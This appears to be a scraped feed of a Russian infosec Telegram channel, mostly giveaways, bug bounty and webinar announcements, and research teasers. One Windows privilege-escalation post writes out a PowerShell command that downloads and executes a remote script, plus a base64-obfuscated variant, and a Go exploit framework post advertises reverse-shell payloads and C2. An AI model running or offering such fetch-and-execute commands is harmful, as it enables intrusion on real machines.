Forwarded from infosecurity
⚡️Разыгрываем полезные книги по информационной безопасности и этичному хакингу (в бумажном варианте):
- Хакерство. Физические атаки с использованием хакерских устройств.
- Тестирование на проникновение с Kali Linux.
- Аппаратный хакинг: взлом реальных вещей.
- Black Hat Go: Программирование для хакеров и пентестеров.
- Black Hat Python: программирование для хакеров и пентестеров, 2-е изд.
• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (26.07 в 19:00) при помощи бота, который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на мой канал @tg_infosec;
2. Подписаться на канал моих друзей @poxek;
3. Нажать на кнопку «Участвовать».
Учитывайте, что бот может немного подвиснуть — не переживайте, просто нажмите еще раз на кнопку «Участвовать».
#Конкурс
- Хакерство. Физические атаки с использованием хакерских устройств.
- Тестирование на проникновение с Kali Linux.
- Аппаратный хакинг: взлом реальных вещей.
- Black Hat Go: Программирование для хакеров и пентестеров.
- Black Hat Python: программирование для хакеров и пентестеров, 2-е изд.
• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (26.07 в 19:00) при помощи бота, который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на мой канал @tg_infosec;
2. Подписаться на канал моих друзей @poxek;
3. Нажать на кнопку «Участвовать».
#Конкурс
🔥23 15😁7⚡3👾1
Forwarded from BI.ZONE Bug Bounty
Вас ждут:
+5% с каждым новым оплачиваемым отчетом и сохранение накопленного бонуса Bounty pass#1: Progress. Лимита на накопительный бонус нет.
+10% для каждого оплачиваемого отчета с 22 октября 2024 года по 21 октября 2025 года.
— Золотая награда за 10 оплаченных уязвимостей или сумма вознаграждений в размере 1 млн руб.
— Серебряная награда за 6 оплаченных уязвимостей или сумма вознаграждений в размере 600 тыс. руб.
— Бронзовая награда за 3 оплаченные уязвимости или сумма вознаграждений в размере 300 тыс. руб.
Каждая награда содержит уникальный набор мерча. Тип награды определяется по максимальному значению: либо количество уязвимостей, либо сумма вознаграждения.
Рейтинг багхантеров будет периодически обновляться в таблице олимпийцев. Результаты узнаем после 22 октября 2024 года.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9😁5
Forwarded from Mobile AppSec World (Yury Shabalin)
Статья для начинающих свой путь в Android
Всем привет!
Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.
В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox
В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.
Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.
Добро пожаловать в мир безопасности мобилок»
#android #frida #ctf #burp
Всем привет!
Статейка для тех, кто только начинает свое знакомство с Android и хотел бы попробовать свои силы на нескольких CTF, чтобы понять какого это.
В статье описаны шаги для настройки окружения:
- Создание эмулятора
- Настройка Burpsuite
- Установка Frida
- Решение двух задачек с HackTheBox
В целом ничего особо примечательного, но как базовая точка для самого популярного вопроса «Как снять пиннинг» подойдет. Конечно, далеко не на всех приложениях эти шаги и этот скрипт сработают, но тем не менее, для старта неплохо.
Ну а дальше только снимать пиннинг и другие вещи с более сложных и не учебных приложений.
Добро пожаловать в мир безопасности мобилок»
#android #frida #ctf #burp
🔥10 4😁2
Forwarded from Mobile AppSec World (Yury Shabalin)
Разбираемся с уязвимостью в Jetpack Navigation
Всем привет!
Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!
Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".
Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))
Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.
А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!
#jetpack #stingray #navigation #issue #research
Всем привет!
Относительно недавно многоуважаемый @OxFi5t подсветил исследование коллег из Positive Technologies про новый вектор атаки на Android через проблемы в библиотеке Jetpack . Спасибо огромное им за исследование, оно реально крутое!
Мы не смогли остаться в стороне, тоже немного покапались в исследовании, нашли пару интересных вещей, не освещенных в оригинальном материале и сегодня я представляю вашему вниманию результат наших трудов, статью "Разбираемся с новой уязвимостью в Android-библиотеке Jetpack Navigation".
Кроме технических деталей самой проблемы мы еще дополнительно проанализировали 1000 приложений из различных маркетов и собрали интересную статистику по подверженности данной проблеме. Если кратко, то 21% из исследованых нами приложений содержит уязвимую навигацию. Эксплуатабельны ли они это отдельный вопрос, который, я надеюсь, мы разберем в дальнейшем обязательно))
Если интересно исследование с цифрами, какие категории оказались наиболее подвержены данной проблеме - можно посмотреть у нас на сайте.
А пока - приятного чтения и спасибо еще раз коллегам за шикарную уязвимость!
#jetpack #stingray #navigation #issue #research
🔥4😁3⚡1
Убойное видео. Как я написал эксплоит для бага в Telegram и что было дальше
#xakep #telegram #1click
Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)
🔓 Читать дальше
🌚 @poxek | 📹 YouTube
#xakep #telegram #1click
Помните нашумевшую багу в Telegram, когда под видом видео пользователь скачивал приложение. Так вот парень из нашего community сделал более глубокий ресерч этого бага. Статья 30 минутной давности)
Недавно мне на глаза попался пост примерно такого содержания: «В Telegram выявлена новая уязвимость, связанная с загрузкой видеороликов». К посту прилагалась демонстрация: пользователь получает видео, при тапе по которому Telegram пытается установить стороннее приложение. При этом проблема не привлекла особенного внимания. Я решил разобраться, работает ли способ, и написать к нему эксплоит.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11😁4🌚1
Bug Bounty в России: как дела с белыми русскими хакерами?
#vk #vkbugbounty
Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)
Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.
➡️ Читать далее
🌚 @poxek | 📹 YouTube
#vk #vkbugbounty
Статья от Петра, того самого чиляльщика (кто поймет, тот поймет)
Привет Хабр! Меня зовут Петр Уваров, я руководитель направления Bug Bounty в VK. Есть много статей, где багхантеры рассказывают о Bug Bounty и своем опыте в нем. Но в этой статье, я бы хотел проанализировать текущую ситуацию на российском рынке, сравнив её с тем, что было раньше, и поговорить про ситуацию с багхантерами. Некоторые вещи, которые я буду говорить прозвучат как цитаты Капитана Очевидность. Другие могут быть приписаны Генералу Ясенпеню, но тем не менее, про них стоит рассказать.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7👾2
Forwarded from Standoff 365
В среду, 31 июля, в 19:00 (мск) можно будет в прямом эфире посмотреть на триаж с двух сторон: глазами компаний-вендоров и команды Standoff Bug Bounty.
🥣 Готовь вопросы или задавай их прямо под постом, а мы передадим все гостям студии, среди которых будут:
✨
✨ Дарья Афанасова — руководитель группы триажа на платформе Standoff Bug Bounty.
✨ Анатолий Иванов aka c0rv4x — идейный лидер багбаунти Standoff, белый хакер с десятилетним стажем.
Они поговорят о том, как триажеры помогают багхантерам правильно составлять отчеты и не упускать важного, чтобы оперативнее получать фидбэк и вознаграждение от вендоров. А еще обсудят, как триаж сокращает путь от получения отчета до устранения уязвимости.
Регистрируйся заранее, чтобы не пропустить стрим. Увидимся в эфире!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24 7😁2⚡1
Forwarded from infosecurity
🎉 Результаты розыгрыша:
Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)
Проверить результаты
Победители:
1. Миша (@ponomarevmisha)
2. D1caprio (@P2Plegend)
3. Валерий (@valerixyz)
4. Розовый (@Chlypka)
5. Анютыч (@Annutych)
6. Dim (@DimGridAle)
7. степанк (@preteenbastard)
8. ctlh (@justsalohiddin)
9. Dmitrii (@romule090)
10. Антон (@amkashirin)
Проверить результаты
🔥13😁8
На 10к подписчиков ждите кое что классное 🌚
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))
С любовью, Похек❤️
Так что зовите друзей, а если уже все тут, то заведите новых и позовите сюда :))
С любовью, Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁36👾6 5
#windows #privesc
Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания.
Эксплуатация:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")И вот простенькая обфускация:
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encodedPlease open Telegram to view this post
VIEW IN TELEGRAM
🔥13⚡2
Forwarded from Road To Ipoteka
Райтап на Bug Bank oт CyberED
В июне у CyberED в их ежемесячном CTF была задачка основанная на реальном отчете на ББ, и за ее решение можно было получить ачивку и немного рейтинга на ББ платформе BI.ZONE.
Запуск задачки наложился с внутренним CTF на работе, и я залетел довольно поздно (старт был в субботу, а я открыл задачу только в понедельник). Задачка оказалась очень простая, решение заняло минут 15 – и то, я искал где подвох и внимательно смотрел по сторонам. В итоге я решил ее 31ым, но за отчет получил и ачивку и рейтинг на платформе BI.ZONE.
Собственно, решил опубликовать свой отчет, так как в комментариях был запрос🙂
В июне у CyberED в их ежемесячном CTF была задачка основанная на реальном отчете на ББ, и за ее решение можно было получить ачивку и немного рейтинга на ББ платформе BI.ZONE.
Запуск задачки наложился с внутренним CTF на работе, и я залетел довольно поздно (старт был в субботу, а я открыл задачу только в понедельник). Задачка оказалась очень простая, решение заняло минут 15 – и то, я искал где подвох и внимательно смотрел по сторонам. В итоге я решил ее 31ым, но за отчет получил и ачивку и рейтинг на платформе BI.ZONE.
Собственно, решил опубликовать свой отчет, так как в комментариях был запрос
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Райтап Bug Bank от CyberED
Анонс задачи:
👾8 3😁1
«Ты приходишь ко мне просить бюджет на ИБ, но...»
Защита бюджета в августе для CISO — жаркое время. Успех предприятия зависит не только от способности предвидеть риски и просчитать стоимость. Главное умение переговорщика — говорить именно так, как принято в финансовых кругах 💵
Есть информация, что на вебинаре 30 июля в 11:00 можно будет пообщаться с CISO в формате непринужденной дискуссии и узнать больше про доказательную базу при обосновании бюджета ИБ, а также узнать у CFO, как уважительно подбирать аргументы в беседе с финансовым кланом💰
О чём еще поведают уважаемые представители МТС RED:
➡ почему на ИБ стоит делать высокие ставки;
➡ как посчитать бюджет на примере мануфактур и предприятий;
➡ ИТ-директор как надёжный союзник в любой кампании;
➡ тактика и манёвры защиты глазами финансового консильери.
Кому будет полезно:
⏺ директорам или руководителям службы ИБ/ИТ;
⏺ финансовый директорам;
⏺ директорам по трансформации бизнеса.
Регистрируйтесь на вебинар и готовьте вопросы! Если что, нас тут не было🎩
Защита бюджета в августе для CISO — жаркое время. Успех предприятия зависит не только от способности предвидеть риски и просчитать стоимость. Главное умение переговорщика — говорить именно так, как принято в финансовых кругах 💵
Есть информация, что на вебинаре 30 июля в 11:00 можно будет пообщаться с CISO в формате непринужденной дискуссии и узнать больше про доказательную базу при обосновании бюджета ИБ, а также узнать у CFO, как уважительно подбирать аргументы в беседе с финансовым кланом💰
О чём еще поведают уважаемые представители МТС RED:
Кому будет полезно:
Регистрируйтесь на вебинар и готовьте вопросы! Если что, нас тут не было
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7😁3🌚3👍1
Go Exploit Framework
#go
Go-exploit — это фреймворк для разработки эксплойтов на языке Go. Этот фреймворк помогает разрабам эксплойтов создавать небольшие, портативные эксплойты. Фреймворк был разработан для упрощения массового сканирования, эксплуатации и интеграции с другими инструментами.
Документацию по API можно найти ТУТ.
Фреймворк Go Exploit включает следующие этапы, которые могут быть связаны друг с другом или выполняться независимо:
Шаг 1 - Проверка цели
Шаг 2 - Сканирование версии
Шаг 3 - Эксплуатация
Шаг 4 - Управление и контроль
Особенности Go Exploit
Фреймворк Go Exploit включает следующие дополнительные функции:
➡️ Автоматическое обнаружение SSL/TLS на удаленной цели.
➡️ Полная поддержка работы через прокси.
➡️ Вывод в формате ключ-значение или JSON для легкой интеграции в другие автоматизированные системы.
➡️ Встроенные Java гаджеты, классы и инфраструктура LDAP.
➡️ Множество пейлоадов для реверс шеллов, дропперов и бинд шеллов.
➡️ Функции, интегрирующие эксплуатацию с другими инструментами или фреймворками, такими как Metasploit и Sliver.
➡️ Встроенный C2 для перехвата зашифрованных/незашифрованных шеллов или размещения имплантов.
➡️ Поддержка различных форматов целей, включая списки, файлы, VulnCheck IP-Intel и другие.
Мое мнение об этой тулзе: пока сыровато и маловато, НО я вижу перспективу в этой тулзе и возможно когда-нибудь она стрельнет или обзаведётся кучей "обвязок", которые сделают данную тулзу полноценно боевой
🌚 @poxek | 📹 YouTube
#go
Go-exploit — это фреймворк для разработки эксплойтов на языке Go. Этот фреймворк помогает разрабам эксплойтов создавать небольшие, портативные эксплойты. Фреймворк был разработан для упрощения массового сканирования, эксплуатации и интеграции с другими инструментами.
Документацию по API можно найти ТУТ.
Фреймворк Go Exploit включает следующие этапы, которые могут быть связаны друг с другом или выполняться независимо:
Шаг 1 - Проверка цели
Шаг 2 - Сканирование версии
Шаг 3 - Эксплуатация
Шаг 4 - Управление и контроль
Особенности Go Exploit
Фреймворк Go Exploit включает следующие дополнительные функции:
Мое мнение об этой тулзе: пока сыровато и маловато, НО я вижу перспективу в этой тулзе и возможно когда-нибудь она стрельнет или обзаведётся кучей "обвязок", которые сделают данную тулзу полноценно боевой
Please open Telegram to view this post
VIEW IN TELEGRAM
api-fuzzing-lists.zip
8.7 MB
API FUZZING LISTS
#api #fuzzing
Вне очереди пост, очень вкусный сборник фаззинг вордлистов для API
Описание данного списка от автора:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports
Взял ТУТ
🌚 @poxek | 📹 YouTube
#api #fuzzing
Вне очереди пост, очень вкусный сборник фаззинг вордлистов для API
Описание данного списка от автора:
744,000+ endpoints
357,000+ object properties
211,000+ object names
127,000+ query parameters
74,000+ parameter values
35,000+ path parameters
8,300+ headers
5,300+ paths
880+ common ports
Взял ТУТ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥33
Идёт Zaheq. Приватное пати. Пришлось сделать двойной доклад, чтобы попасть на эту тусу)
Доклад нельзя было фоткать, потому что все приватно)
Выступал я, один секретный спикер, а также Омар с докладом про Вову Хакеру (и оказалось, что название не кликбейт было)))
🌚 @poxek
Доклад нельзя было фоткать, потому что все приватно)
Выступал я, один секретный спикер, а также Омар с докладом про Вову Хакеру (и оказалось, что название не кликбейт было)))
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥35😁7 3